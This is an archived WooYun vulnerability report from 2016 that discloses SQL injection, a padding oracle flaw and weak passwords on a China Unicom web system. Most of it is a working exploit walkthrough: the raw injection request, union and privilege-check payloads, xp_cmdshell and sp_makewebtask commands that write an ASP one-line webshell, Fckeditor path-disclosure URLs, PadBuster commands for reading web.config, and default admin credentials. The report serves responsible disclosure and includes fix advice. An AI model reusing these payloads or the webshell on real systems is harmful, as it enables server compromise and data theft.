当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0214271

漏洞标题:运营商安全之中国联通多个漏洞打包(手动注入案例)

相关厂商:中国联通

漏洞作者: harbour_bin

提交时间:2016-05-30 10:36

修复时间:2016-07-16 18:00

公开时间:2016-07-16 18:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-30: 细节已通知厂商并且等待厂商处理中
2016-06-01: 厂商已经确认,细节仅向厂商公开
2016-06-11: 细节向核心白帽子及相关领域专家公开
2016-06-21: 细节向普通白帽子公开
2016-07-01: 细节向实习白帽子公开
2016-07-16: 细节向公众公开

简要描述:

一个悲催的漏洞...

详细说明:

#1 SQL注入漏洞
#1.1 证明属于中国联通 http://**.**.**.**/

1-0.png


#1.2 SQL注入位置, 手动注入过程展示

POST /zsk/modules/query_chemi.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/zsk/modules/query_chemi.aspx
Cookie: ASP.NET_SessionId=mm3phznvzutfkvpbcfuf5t11
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 688
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTQ5MjMyMjg0MQ9kFgICAw9kFgICAQ9kFhICBw88KwARAgAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZAEQFgAWABYAZAIJDw8WBB4LQ29tbWFuZE5hbWUFATEeB1Zpc2libGVoZGQCCw8PFgQfAgUBMR8DaGRkAg0PDxYEHwIFATIfA2hkZAIPDw8WBB8CBQEwHwNoZGQCEQ8PFgQeBFRleHQFCeesrCAxIOmhtR8DaGRkAhMPDxYEHwQFCeWFsSAwIOmhtR8DaGRkAhUPDxYEHwQFEuaAu%2BWFsSAwIOadoeiusOW9lR8DaGRkAhcPEGQQFQAVABQrAwAWAGQYAQUJR3JpZFZpZXcxDzwrAAwBCGZkr%2Boq2PI%2FFttoRcE4FVUv4XZxwV1K%2B9h0LLmKvkRAHtU%3D&__EVENTVALIDATION=%2FwEWCQL32aavCALw7PDJCALx7PDJCALy7PDJCALz7PDJCAL07PDJCALEhISFCwLdkpmPAQLP%2FqqSD2bBx516y2DQPGYn6nuzTIrt8f2RChkdXX6RV6E7s%2Bp2&ddlSort=1&txtName=1%' and '%'=' &btnOK=%E6%A3%80+%E7%B4%A2


注入点: txtName
Union注入POC:

1%'  order by 7-- 确定列数
1%' union select null,db_name(),@@version,system_user,null,host_name(),null-- 获取数据


1-3.png


DBA权限

1%' and 1=(select IS_SRVROLEMEMBER('sysadmin'))--


1-2.png


可执行系统命令

ipconfig
Windows IP Configuration
Ethernet adapter 本地连接 3:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
Default Gateway . . . . . . . . . : **.**.**.**


D:\ 的目录
2014-07-18 03:01 <DIR> 9ebaf80b4e53708f8a66ce71606833
2016-01-04 14:07 <DIR> ac
2016-05-28 00:00 <DIR> acbackup
2013-12-16 14:44 125,414,912 ACCT_900.bak
2014-03-31 10:55 141,642,240 He�SalesControlUnicom201R0331.bak
2015-04-01 14:23 35,651,584 HTCIP.mdf
2015-04-01 14:23 86,441,984 HTCIP_1.ldf
2013-11-09 16:25 27,596,288 HTCIP_backup_201308290000.bak
2013-08-29 11:38 5,859,840 lt_pos_lbs.bak
2013-08-29 00:00 1,526,272 Middleware_hbtj_backup_201308290000.bak
2014-03-21 12:_7 <DIR> Sqldata
2014-11-22 09:49 24,205 SQLQuery1联通更新2014.8.11.sql
2014-03-21 10:38 <DIR> Test
2013-08-29 11:38 34R,078,272 UNICOM_LBS.bak
2014-04-02 09:25 702,121,472 UNICOM_LBS_201R0225.bak
2013-11-13 23:01 3,388,858 zjkajtbz.zip
2015-06-30 10:49 <DIR> 数据库备份
2014-11-22 10:05 43,425 权_.sql
12 个文件 1,474,789,352 字节
6 个目录 524,787,335,168 可用字节


##1.3 查找网站目录, 目标是写入一句话后门
首先, 尝试使用SQLMap中的--os-shell, 执行失败, 显示为不支持多语句注入, 手动测试发现是可以的, 先想其他办法吧;
然后, 发现网站存在Fckeditor编辑器, 服务器是IIS6.0, 是否可以解析漏洞写入后门

http://**.**.**.**/zsk/fckeditor/editor/dialog/fck_about.html 版本号2.6.3
http://**.**.**.**/zsk/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2F**.**.**.**%2Fzsk%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx 获得Fckeditor目录
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder 生成.asp的目录并上传jpg文件, 实现目录解析
http://**.**.**.**/zskhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/image/asp.asp/wy.jpg
http://**.**.**.**/zskhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/image/wy.asp;wy(1).jpg
两者都无法解析, 奇怪了, 我猜测是否是因为服务器禁止脚本执行


但通过Fckeditor爆路径,我们可以获取网站路径

http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/ 暴路径问题
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=~/


确定路径位置:

1-4.png


#1.4 手动写入一句话后门

两种方式
1%'; exec sp_makewebtask 'D:\ac\wy.txt',' select ''<%execute(request("a"))%>'' ';--
1%'; exec sp_makewebtask 'C:\sjz\zsk\system\wy.txt',' select ''<%execute(request("a"))%>'' ';--
1%'; exec xp_cmdshell 'echo "<%execute(request("value"))%>">>D:\ac\hello.txt';--
1%'; exec xp_cmdshell 'echo "<%execute(request("value"))%>">>C:\sjz\zsk\system\hello.txt';--


结果证明

D:\ac 的目录
2016-05-29 20:45 <DIR> .
2016-05-29 20:45 <DIR> ..
2016-05-29 20:45 33 hello.txt
2016-05-29 20:15 408 wy.txt
2014-06-11 15:09 616 [message].txt
2014-06-11 15:09 7,559 张家口数据库修改20140610.sql
2014-01-02 17:04 3,200,082 救援资源Data20140102.zip
2014-06-20 12:31 <DIR> 数据库备份20140620
2014-06-09 15:26 996 新建 文本文档.txt
2014-06-20 11:32 224 查询图片.sql
2014-01-02 19:04 5,481,382 知识.zip
2014-01-02 18:36 10,610 石家庄自查自报数据库修改.sql
2014-03-26 09:52 4,825 脚本.zip
10 个文件 8,706,735 字节
3 个目录 524,785,500,160 可用字节


D盘可以写入, 但C盘网站目录应该禁止写入了, 语句执行失败, 悲剧...
#2 Padding Oracle Attack漏洞

padBuster.pl http://**.**.**.**/zsk/WebResource.axd?d=FEPWE03guUt5kpUQHEAucw2 FEPWE03guUt5kpUQHEAucw2 16 -encoding 3 -plaintext "|||~/web.config"


+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@**.**.**.** |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 404 2289 N/A
2 ** 255 500 4894 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (93/256) [Byte 16]
[+] Success: (154/256) [Byte 15]
[+] Success: (150/256) [Byte 14]
[+] Success: (54/256) [Byte 13]
[+] Success: (192/256) [Byte 12]
[+] Success: (207/256) [Byte 11]
[+] Success: (153/256) [Byte 10]
[+] Success: (118/256) [Byte 9]
[+] Success: (71/256) [Byte 8]
[+] Success: (4/256) [Byte 7]
[+] Success: (228/256) [Byte 6]
[+] Success: (246/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (27/256) [Byte 3]
[+] Success: (78/256) [Byte 2]
[+] Success: (227/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 71c1971d296093d2ac03582ba80003a3
[+] Intermediate Bytes (HEX): 0dbdeb630617f6b082603745ce6964a2
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: ccGXHSlgk9KsA1grqAADowAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


Bruter.pl http://**.**.**.**/zsk/ScriptResource.axd ccGXHSlgk9KsA1grqAADowAAAAAAAAAAAAAAAAAAAAA1 16


Total Requests:101
Resulting Exploit Block:WLwionz9NMbfVXcCwv2UuHHBlx0pYJPSrANYK6gAA6MAAAAAAAAAAAAAAAAAAAAA0


http://**.**.**.**/zsk/ScriptResource.axd?d=WLwionz9NMbfVXcCwv2UuHHBlx0pYJPSrANYK6gAA6MAAAAAAAAAAAAAAAAAAAAA0


#3 弱密码进入后台

http://**.**.**.**/zsk/system/login.aspx admin\123456
http://**.**.**.**/sjzjcxxgl/LoginWXY.aspx admin\admin
http://**.**.**.**/sjzxinxi/SysManage/Login.aspx admin\123456


不截图了, 很容易测试的

漏洞证明:

#1 SQL注入

1-1.png


#2 Padding Oracle Attack

1-5.png

修复方案:

1、Padding Oracle Vulnerability漏洞, 安装微软官方补丁;
2、SQL注入进行过滤, 存在注入的地方很多, 我不列举了, 希望能排除一下;
3、弱密码修改;
4、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-06-01 17:50

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-30 10:52 | 李旭敏 ( 普通白帽子 | Rank:866 漏洞数:118 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    = 。=